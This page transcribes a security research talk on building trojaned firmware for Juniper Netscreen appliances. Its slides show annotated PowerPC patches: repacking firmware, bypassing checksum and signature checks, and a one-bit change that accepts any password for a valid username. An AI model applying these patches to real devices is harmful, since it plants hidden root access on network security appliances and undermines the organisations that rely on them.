netscreen of the dead
play

Netscreen of the Dead Developing a Trojaned Firmware for Juniper - PowerPoint PPT Presentation

May 15, 2023 •468 likes •774 views

Netscreen of the Dead Developing a Trojaned Firmware for Juniper Netscreen Appliances Cast Graeme Neilson Security Consultant Aura Software Security graeme@aurasoftwaresecurity.co.nz Trailer What if a core network security device was

  1. Netscreen of the Dead Developing a Trojaned Firmware for Juniper Netscreen Appliances

  2. Cast Graeme Neilson Security Consultant Aura Software Security graeme@aurasoftwaresecurity.co.nz

  3. Trailer What if a core network security device was compromised? • – an attacker has exploited a vulnerability – malicious appliance supplier – malicious third party support – malicious employee This is a POST EXPLOIT, SERIAL CONSOLE or MITM attack. • Goal is hidden root control of the appliance. • – Discuss reversing and modifying the firmware code – Demo a zombied Netscreen

  4. Opening Scene Netscreens are manufactured by Juniper Inc All in one Firewall, VPN, Router security appliance. • SME to Datacentre scale (NS5XP – NS5000). • Common Criteria and FIPS certified. • Run a closed source, real time OS called ScreenOS. • ScreenOS is supplied as a binary firmware 'blob'. • NS5XT Model: PowerPC 405 GP RISC processor 64MB Flash • Serial console, Telnet, SSH, HTTP/HTTPS admin interfaces •

  5. Attack Attacking firmware - two vectors of attack: Live evisceration: debugging with remote GDB debugger over • serial line Feeding on the remains: dead listing / static binary analysis • using disassembler and hex editor PowerPC architecture fixed instruction size of 4 bytes • flat memory model • 32 GP registers, no explicit stack, link register • IBM PPC405 Embedded Processor Core User Manual •

  6. Live Evisceration Embedded Linux Development Kit has GDB compiled for • PowerPC 405 processor No source so create custom .gdbinit for PPC registers and • 'stack' to provide 'SoftICE' like context on breaks. Network connection to the Netscreen and run: • set gdb enable Connect remote gdb via serial console •

  7. Worked: • – Memory dumps – Query memory addresses Didn't work: • – Breakpoints – Single stepping

  8. Feeding on the Remains ● Compared many different versions of ScreenOS firmware. /--------------------------\ ● Revealed a 4 section structure | HEADER | |--------------------------| ● Header: | | |--------------------------| sig sysinfo 00000000: EE16BA81 00110A12 00000020 02860000 | STUB | 00000010: 004E6016 15100050 29808000 C72C15F7 |--------------------------| size checksum | | |--------------------------| size = compressed image size – 79 bytes | UNKNOWN | sysinfo = 00, platform, cpu, version |--------------------------| | | ● Stub contains strings relating to LZMA compression |--------------------------| algorithm. | COMPRESSED BINARY | | UPDATE BLOB [BUB] | ● Compressed Binary Update Blob (Bub) also has a header. \--------------------------/

  9. Bub The header of the Bub appears to be a customised LZMA • header. Comparative analysis again of different Bub headers. • The standard LZMA header has 3 fields: • options , dictionary_size, uncompressed_size 'Bub' header has 3 fields: • signature bytes , options, dictionary_size 00012BF0: 00000000 00000000 00000000 00000000 00012C00: 01440598 5D002000 0000 7705 92C63DFC 00012C10: 07046E0E 343AA6F1 899098E8 8EDAFDA8

  10. Bub Can Change . Uncompress Bub ● Cut out the Bub from firmware file. ● Insert an uncompressed_size field of value -1 == unknown size ● Modify the dictionary_size from 0x00200000 to 0x00008000 ● Then we can decompress the Bub using freely available LZMA utilities Compress Bub ● Compress the binary with standard LZMA utilities. ● Modify the dictionary_size field from 0x00002000 to 0x00200000 . ● Delete the uncompressed_size field of 8 bytes. ● Insert new Bub into firmware file replacing original compressed blob.

  11. Night of the Living Netscreen ● Cut out the compressed Bub section of the image. ● Uncompress the Bub. ● Modify the resulting binary to add or change code and / or data. ● Re-compress the modified binary into a new Bub. ● Prepend the original firmware header to the modified Bub. ● Upload the modified firmware over serial = SUCCESS. ● Upload the modified firmware over network = FAILED.

  12. Autopsy Uncompressed Bub is ~20Mb ScreenOS binary with a header. • Want to load into IDA but need a loading address so that • references within the program point to the correct locations. From header: program_entry = address – offset • signature offset address 00000000: EE16BA81 00010110 00000020 00060000 00000010: 01440578 00000000 00000000 F8A2FA6F Confirm with live debugging • Correctly loaded binary but unknown sections... •

  13. Autopsy ii Use IDA scripts to find function prologs /--------------------------\ ● | HEADER | (0x9421F*) and mark as code. |--------------------------| Mark strings in data section for cross ● | SCREENOS CODE | references. |--------------------------| Use error strings to identify functions and | SCREENOS DATA | ● |--------------------------| rename. | BOOT LOADER CODE | Search for str_cmp, file_read, file_write, ● |--------------------------| login etc. | BOOT LOADER DATA | |--------------------------| Build up a picture of the binary structure ● | 0xFFs | and functions. |--------------------------| Need to cut out boot loader and | other stuff! | ● \--------------------------/ disassemble separately with loading address 0x0.

  14. Netscreen of the Dead ScreenOS Trojaned Firmware required functionality: • – Install/Upgrade: Load trojan firmware via serial, tftp and web – Maintain Access: Include a back door login mechanism – Payload: Execute arbitrary code injected into the image All modification hand crafted asm and hex editing the binary •

  15. First Bite Install / Upgrade Checksum and size in header are checked when images • loaded over the network via TFTP or Web 00000000: EE16BA81 00110A12 00000020 02860000 00000010: 004E6016 15100050 29808000 C72C15F7 checksum Checksum is calculated, could reverse the algorithm... but on • loading any bad checksum value is printed to the console. If we modify the firmware to print out the correct checksum • value we would have a 'checksum calculator' firmware which we load modified firmware against. With correct checksum can now load modified firmware via tftp • and web interface.

  16. First Bite ii 008B60E4 lwz %r4, 0x1C(%r31) # %r4 contains header checksum 008B60E8 cmpw %r3, %r4 # %r3 contains calculated checksum 008B60EC beq loc_8B6110 # branch away if checksums matched #008B60EC mr %r4,%r3 # print out calculated checksum 008B60F0 lis %r3, aCksumXSizeD@h # " cksum :%x size :%d\n" 008B60F4 addi %r3, %r3, aCksumXSizeD@l 008B60F8 lwz %r5, 0x10(%r31) 008B60FC bl Print_to_Console # %r4 is printed to console 008B6100 lis %r3, aIncorrectFirmw@h # "Incorrect firmware data, 008B6104 addi %r3, %r3, aIncorrectFirmw@l 008B6108 bl Print_to_Console

  17. One Bit{e} Maintain Access Console, Telnet, Web and SSH all compare password hashes • and use the same function. SSH falls back to password if client does not supply a key unless • password authentication has been disabled. One bit patch provides login with any password if a valid • username is supplied.

  18. One Bit{e} ii 003F7F04 mr %r4, %r27 003F7F08 mr %r5, %r30 003F7F0C bl COMPARE_HASHES # does a string compare 003F7F10 cmpwi %r3, 0 # equal if match #0x397F30 cmpwi %r3, 1 # equal if they don't match 003F7F14 bne loc_3F7F24 # login fails if not equal (branch) 003F7F18 li %r0, 2 003F7F1C stw %r0, 0(%r29) 003F7F20 b loc_3F7F28

  19. Infection Injecting code into the binary ScreenOS code section contains a block of nulls • Proof of concept code injected into nulls • Proof of Concept Code :: motd Patch a branch in ScreenOS to call our code • Call ScreenOS functions from our code • Create new code and functionality • Branch back to callee •

  20. Infection ii stwu %sp, -0x20(%sp) mflr %r0 lis %r3, string_msb_address addi %r3, %r3, string_lsb_address bl Print_To_Console mtlr %r0 addi %sp, 0x20 bl callee_function

  21. Zombie Loader All Juniper ScreenOS images signed. • Administrator can load a Juniper certificate to validate • firmware Certificate NOT installed by default. • Administrator can delete this certificate. • Check is done in the BOOT LOADER which we can modify to • authenticate all images or only non-Juniper images Delete certificate -> install bogus firmware -> re-install • certificate

  22. Zombie Loader ii 0000D68C bl sub_98B8 0000D690 cmpwi %r3, 0 # %r3 has result of image validation 0000D694 beq loc_D6B0 # branch if passed #0000D694 b loc_D6B0 # always branch, all images authenticated #0000D694 bne loc_D6B0 # ...or only bogus images authenticated 0000D698 lis %r3, aBogusImageNotA@h # Bogus image not authenticated" 0000D69C addi %r3, %r3, aBogusImageNotA@l 0000D6A0 crclr 4*cr1+eq 0000D6A4 bl sub_C8D0 0000D6A8 li %r31, -1 0000D6AC b loc_D6E0 0000D6B0 lis %r3, aImageAuthentic@h # Image authenticated!

  23. Demo: ScreamOS

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

400 . 20 . , - , , - , . , , .

400 . 20 . , - , , - , . , , .

400 . 20 . , - , , - , . , , . The Royal Hotel Spa, Resort&Convention Venter 5*Dlx Isrotel Dead Sea 5* The Daniel Dead Sea 5* Le Meridien Dead Sea 5* Crowne Plaza Dead

188 views • 17 slides
Dead Code Elimination (DCE) Dead code elimination is an optimization that removes DEAD

Dead Code Elimination (DCE) Dead code elimination is an optimization that removes DEAD

Dead Code Elimination (DCE) Dead code elimination is an optimization that removes DEAD variables A variable that is defined and not LIVE OUT is DEAD do { computeLiveness() foreach instruction I { if (defs.contains(I) &&

599 views • 12 slides
2018/10/24 1 2018/10/24 2 SAFE DEAD WORK SAFE DEAD WORK.. What is this?

2018/10/24 1 2018/10/24 2 SAFE DEAD WORK SAFE DEAD WORK.. What is this?

2018/10/24 1 2018/10/24 2 SAFE DEAD WORK SAFE DEAD WORK.. What is this? There are two practical options.. NRS 097-2-1 compliance (switch off and break before you make) What is the Dead Grid Safety Lock?

907 views • 27 slides
Its Your Life, Real Education Unit 1, Lesson 5 1 Who is Dead Prez? 2 Video Clip 10 - Dead

Its Your Life, Real Education Unit 1, Lesson 5 1 Who is Dead Prez? 2 Video Clip 10 - Dead

Its Your Life, Real Education Unit 1, Lesson 5 1 Who is Dead Prez? 2 Video Clip 10 - Dead Prez - Hip Hop Dead Prez is a hip hop group that makes music designed to free the mind of their community from The Matrix. Study them. 3 Video

621 views • 15 slides
Functional TDD with F# Mark Seemann http://blog.ploeh.dk @ploeh TDD is dead!

Functional TDD with F# Mark Seemann http://blog.ploeh.dk @ploeh TDD is dead!

Look, no Mocks! Functional TDD with F# Mark Seemann http://blog.ploeh.dk @ploeh TDD is dead! http://david.heinemeierhansson.com/2014/tdd-is-dead-long-live-testing.html Is TDD dead? A system you cant test Detestable

656 views • 63 slides
Orangeville Ontario, 1985 12 dead, 155 injured F3? Joplin Missouri, 2011 166 dead F5 wind

Orangeville Ontario, 1985 12 dead, 155 injured F3? Joplin Missouri, 2011 166 dead F5 wind

Orangeville Ontario, 1985 12 dead, 155 injured F3? Joplin Missouri, 2011 166 dead F5 wind speeds greater than 200 miles/hour On a Sunday afternoon in May, our world turned upside down. Time stood still and nothing would ever be the

1.28k views • 64 slides
Still wat St water dead zone & collimat dead zone & col mated ej ed eject ecta in g

Still wat St water dead zone & collimat dead zone & col mated ej ed eject ecta in g

Still wat St water dead zone & collimat dead zone & col mated ej ed eject ecta in g in granula lar jet im jet impact ct Wendy W. We W. Zh Zhang Ni Nicholas G Guttenberg, He Herve T Turlier, Jake E Jake Ellowitz, Si

639 views • 33 slides
Cert-Lexsi Cert-Lexsi Dead angle ( Torpig vs PRG) Dead angle ( Torpig vs PRG) Dead angle (

Cert-Lexsi Cert-Lexsi Dead angle ( Torpig vs PRG) Dead angle ( Torpig vs PRG) Dead angle (

Cert-Lexsi Cert-Lexsi Dead angle ( Torpig vs PRG) Dead angle ( Torpig vs PRG) Dead angle ( Torpig vs PRG) Dead angle ( Torpig vs PRG) 2 Agenda Cert-Lexsi Presentation Torpig vs PRG: Introduction Ecosystems Propagation

633 views • 15 slides
Dead Loads and Idealization of Structural Members Steven Vukazich San Jose State University

Dead Loads and Idealization of Structural Members Steven Vukazich San Jose State University

Dead Loads and Idealization of Structural Members Steven Vukazich San Jose State University What is a Dead Load? Dead Loads are Fixed Position Gravity Loads Examples are weights of the following: Ceiling, Flooring, Faade,

689 views • 11 slides
Wanted Bacteria: Dead or Dead The development of a kill switch that activates upon a cell escaping

Wanted Bacteria: Dead or Dead The development of a kill switch that activates upon a cell escaping

Wanted Bacteria: Dead or Dead The development of a kill switch that activates upon a cell escaping from the laboratory setting into the surrounding environment The Public Fear of Genetically Modified Organisms Development of a Kill Switch

383 views • 27 slides
Dead Code Elimination & Dead code elimination Constant Propagation Conceptually similar

Dead Code Elimination & Dead code elimination Constant Propagation Conceptually similar

Dead Code Elimination on SSA Form Dead Code Elimination & Dead code elimination Constant Propagation Conceptually similar to mark-sweep garbage collection C t ll i il t k b ll ti > Mark useful operations on SSA Form SSA F

1.29k views • 4 slides
Structural Loads Structural Loads Table 1. Typical Design Dead Loads Dead Loads: Gravity loads of

Structural Loads Structural Loads Table 1. Typical Design Dead Loads Dead Loads: Gravity loads of

Structural Loads Structural Loads Table 1. Typical Design Dead Loads Dead Loads: Gravity loads of constant magnitudes and fixed positions that act permanently on p p y the structure. Such loads consist of the weights of the structural

243 views • 8 slides
1 Paul: For if there is no resurrection of the dead, then not even Christ has been raised.

1 Paul: For if there is no resurrection of the dead, then not even Christ has been raised.

ARISE Part 1: Whats the Big Deal? - 03.14.10 Intro: In 3 weeks we ll celebrate Easter, the day when Jesus rose from the dead, the day of his resurrection. I believe it s critical that we begin now to think about what this means to us.

331 views • 4 slides
Friedrich NIETZSCHE If it is in purple then it is a quote GOD IS DEAD. God remains

Friedrich NIETZSCHE If it is in purple then it is a quote GOD IS DEAD. God remains

Friedrich NIETZSCHE If it is in purple then it is a quote GOD IS DEAD. God remains dead. And we have killed him. How shall we comfort ourselves, the murderers of all murderers? What festivals, what sacred games of atonement shall we

815 views • 27 slides
Dead on Cont act W ork Presentation By Kristal Whitmore Hi, my name is Kristal. The band I was

Dead on Cont act W ork Presentation By Kristal Whitmore Hi, my name is Kristal. The band I was

Dead on Cont act W ork Presentation By Kristal Whitmore Hi, my name is Kristal. The band I was assigned to do work for was Dead on Contact. I have consistently coresponded with Tim, the bands drummer. When we had our first

400 views • 16 slides
Here Beside the Rising Tide: The Dead, the Counterculture, & American Democracy PRELUDE

Here Beside the Rising Tide: The Dead, the Counterculture, & American Democracy PRELUDE

**Do not publish or quote without explicit permission of the author.** 1 Here Beside the Rising Tide: The Dead, the Counterculture, and American Democracy Michael J. Kramer Here Beside the Rising Tide: The Dead, the Counterculture, &

573 views • 32 slides
GNAOI RFP No. NB3880C Proposers Conference 4 th October 2019 AURA, Tucson, Arizona,

GNAOI RFP No. NB3880C Proposers Conference 4 th October 2019 AURA, Tucson, Arizona,

GNAOI RFP No. NB3880C Proposers Conference 4 th October 2019 AURA, Tucson, Arizona, Teleconference + Video conference Gemini GNAOI Proposers Conference 1 David Henderson, Barbara Peterman, Scot Kleinman, Trent Dupuy, Andrea Blank 4 October

934 views • 68 slides
Logic-Based Systems AI Lecture Prof. Carolina Ruiz Worcester Polytechnic Institute Using

Logic-Based Systems AI Lecture Prof. Carolina Ruiz Worcester Polytechnic Institute Using

Logic-Based Systems AI Lecture Prof. Carolina Ruiz Worcester Polytechnic Institute Using Theorem Provers AS ASSISTANTS AS REASONING SYSTEMS tool for mathemathicians Proof-Checkers: to implement independent agents that

491 views • 13 slides
Literature Review: IOVS and J Neuroscience GREGORY P. VAN STAVERN, M.D. PROFESSOR, DEPARTMENT OF

Literature Review: IOVS and J Neuroscience GREGORY P. VAN STAVERN, M.D. PROFESSOR, DEPARTMENT OF

Literature Review: IOVS and J Neuroscience GREGORY P. VAN STAVERN, M.D. PROFESSOR, DEPARTMENT OF OPHTHALMOLOGY AND VISUAL SCIENCES AND NEUROLOGY DIRECTOR, VISUAL ELECTROPHYSIOLOGY SERVICES WASHINGTON UNIVERSITY IN ST. LOUIS PhNR in LHON LHON

638 views • 32 slides
Solid Texture Synthesis Solid Texture Synthesis Solid Texture Synthesis from 2D Exemplars from

Solid Texture Synthesis Solid Texture Synthesis Solid Texture Synthesis from 2D Exemplars from

Solid Textures Solid Textures Solid Texture Synthesis Solid Texture Synthesis Solid Texture Synthesis from 2D Exemplars from 2D Exemplars from 2D Exemplars Johannes Kopf, University of Konstanz Chi-Wing Fu, Hong Kong Sc & Tech Daniel

268 views • 10 slides
Debian Hamradio Blend Iain R. Learmonth < irl@debian.org > Debian Hamradio Maintainers 31st

Debian Hamradio Blend Iain R. Learmonth < irl@debian.org > Debian Hamradio Maintainers 31st

Debian Hamradio Blend Iain R. Learmonth < irl@debian.org > Debian Hamradio Maintainers 31st April 2016 Iain R. Learmonth (Debian Hams) Debian Hamradio Blend 31st April 2016 1 / 13 Pure Blends A collection of tasks (metapackages) Iain

783 views • 13 slides
Chrome OS Internals Josh Triplett josh@joshtriplett.org LinuxCon Europe 2014 Josh Triplett

Chrome OS Internals Josh Triplett josh@joshtriplett.org LinuxCon Europe 2014 Josh Triplett

Chrome OS Internals Josh Triplett josh@joshtriplett.org LinuxCon Europe 2014 Josh Triplett Chrome OS Internals LinuxCon Europe 2014 1 / 43 Overview Intro to Chrome OS Architecture of Chrome OS Verified boot and developer mode Security

1.39k views • 110 slides
MIGRAINE MANAGEMENT Joanna G. Katzman, M.D.,M.S.P.H. Associate Professor, Department of

MIGRAINE MANAGEMENT Joanna G. Katzman, M.D.,M.S.P.H. Associate Professor, Department of

MIGRAINE MANAGEMENT Joanna G. Katzman, M.D.,M.S.P.H. Associate Professor, Department of Neurosurgery UNM Pain Center and Project ECHO Pain University of New Mexico Disclosure The presenter has no financial relationship to this program.

360 views • 25 slides
Application of Satellite and Ozonesonde Data to the Study of Nighttime Tropospheric Ozone Impacts

Application of Satellite and Ozonesonde Data to the Study of Nighttime Tropospheric Ozone Impacts

Application of Satellite and Ozonesonde Data to the Study of Nighttime Tropospheric Ozone Impacts and Relationship to Air Quality Greg Osterman Jet Propulsion Laboratory CMAS Meeting - October 25, 2011 Investigators AURA 2010 Proposal

534 views • 27 slides

More recommend